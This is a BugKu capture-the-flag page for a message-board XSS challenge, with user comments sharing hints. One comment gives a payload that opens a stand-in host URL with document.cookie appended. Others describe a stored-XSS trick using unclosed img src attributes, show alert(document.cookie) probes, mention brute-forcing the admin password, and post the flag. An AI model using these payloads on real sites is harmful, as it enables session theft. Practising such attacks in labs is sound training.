留言板WEB 未解决
分数:
10
金币:
3
题目作者:
harry
一 血:
꧁༺༽༾ཊ彪ཏ༿༼༻꧂
一血奖励:
5金币
解 决:
2299
提 示:
题目无需登录后台!需要xss平台接收flag
描 述:
http协议需要http协议的xss平台
评论
treasure11 5月前
举报
....太难了
mAns0nw0W 5月前
举报
flag{0d25978069e52fed99591c5c19ca0663}
APTX4869ZRC 6月前
举报
BugKu真的很酷
Warm2pPing 6月前
举报
提示:需要xss平台接收flag 那就是自己找一个XSS平台咯~ 然后开始注入 大概是平台地址加上 ?cookie=+document.cookie 没时间了自己拼接吧
kanljk 7月前
举报
<svg onload="window.open('http://IP/'+document.cookie)">
XRain 7月前
举报
思路想错了,我一直在测试前台留言的XSS,前台留言时在 [img][/img] 之间插入超长字符串,就会导致 img 标签的 src 属性的双引号没有闭合,直到再次留言时插入的 [img][/img] 才闭合,所以可以给后一次留言中的 img 标签注入 onerror 属性及其 js 代码,最终导致前台存储型 XSS。不过,我离题了,白白浪费了半天的时间。
18363158240 7月前
举报
小括号被转成‘|’了,xss漏洞被修复了
老渡真的不懂 8月前
举报
有大佬能看一下吗,注入代码XSS平台怎么都接收不到,结果去爆admin的密码登录后就接收到了。。。。。
laodao 9月前
举报
这个题有问题吧 必须要登录admin.php才可以看到flag,admin密码不是弱密码
harry 管理员 8月前
举报
不需要登录
2762249990 9月前
举报
先目录扫描,扫出admin.php,登录,原页面<script>alert(1)</script>,看到有1弹窗于是<script>alert(document.cookie)</script>,显示出flag,url解码